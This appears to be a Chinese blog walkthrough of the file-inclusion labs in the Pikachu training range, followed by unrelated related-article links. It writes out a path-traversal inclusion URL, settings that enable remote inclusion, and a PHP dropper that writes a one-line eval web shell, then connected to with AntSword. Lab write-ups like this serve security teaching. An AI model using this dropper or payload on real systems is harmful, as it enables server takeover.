当前位置: 首页 > article >正文

pikachu文件包含漏洞靶场

article 2024/11/14 5:43:58

一.pikachu(local)

1.随便点击一个选项尝试一下

2.进行抓包然后放入攻击器

3.发现有几个长度不一样,访问一下看看

4.访问到了账号密码

5.创建一个txt文件验证一下文件包含的作用

6.文件要放到pikachu文件夹中

7.

http://www.pikachu.com:90/vul/fileinclude/fi_local.php?filename=../../../shell.txt&submit=%E6%8F%90%E4%BA%A4

二File Inclusion(remote)

1.修改配置

php.in:

allow_url_fopen = on

allow_url_include = on

2.宝塔公网上创建一个x.php文件,内容是

<?php fputs(fopen("shw.php","w"),'<?php eval($_POST["cmd"]);?>')?>

3.file后面输入文件地址

4.fileinclude目录下找到php文件

5.蚁剑连接成功


http://www.kler.cn/a/289208.html

相关文章:

  • 《MYSQL45讲》kill不掉的线程
  • Matlab: 生成对抗网络,使用Datastore结构输入mat格式数据
  • 【深圳大学】数据结构A+攻略(计软版)
  • 编译ffmpeg动态库时设置RPATH为$ORIGIN
  • 学Linux的第八天
  • 【Elasticsearch入门到落地】1、初识Elasticsearch
  • JavaScript-document.write和innerHTML的区别
  • Unity(2022.3.41LTS) - UI详细介绍-Scroll View(滚动视图)
  • Flink 1.14.* Flink窗口创建和窗口计算源码
  • 报告 | 以消费者为中心,消费品零售行业数字化建设持续深化
  • 详解React setState调用原理和批量更新的过程
  • Python基础笔记
  • 代码随想录算法训练营第六十二天 | 图论part11
  • 51单片机-串口通信(单片机和PC互发数据)
  • Haskell爬虫:连接管理与HTTP请求性能
  • SprinBoot+Vue校园活动报名微信小程序的设计与实现
  • 【LeetCode】两数之和
  • 开源模型应用落地-qwen2-7b-instruct-LoRA微调-ms-swift-单机单卡-V100(十二)
  • R3 天气预测
  • C++复习day01
  • Java中的双亲委派模型以及如何破坏双亲委派
  • JetBrains`s IntelliJ IDEA springboot项目 gradle-bin安装 国内加速
  • upload-labs闯关攻略
  • 代码随想录刷题day21丨669. 修剪二叉搜索树,108.将有序数组转换为二叉搜索树,538.把二叉搜索树转换为累加树,二叉树总结
  • Java-通过Runnable接口实现多线程
  • DNS介绍(hosts文件,域名结构),面试题(输入url后会发生什么)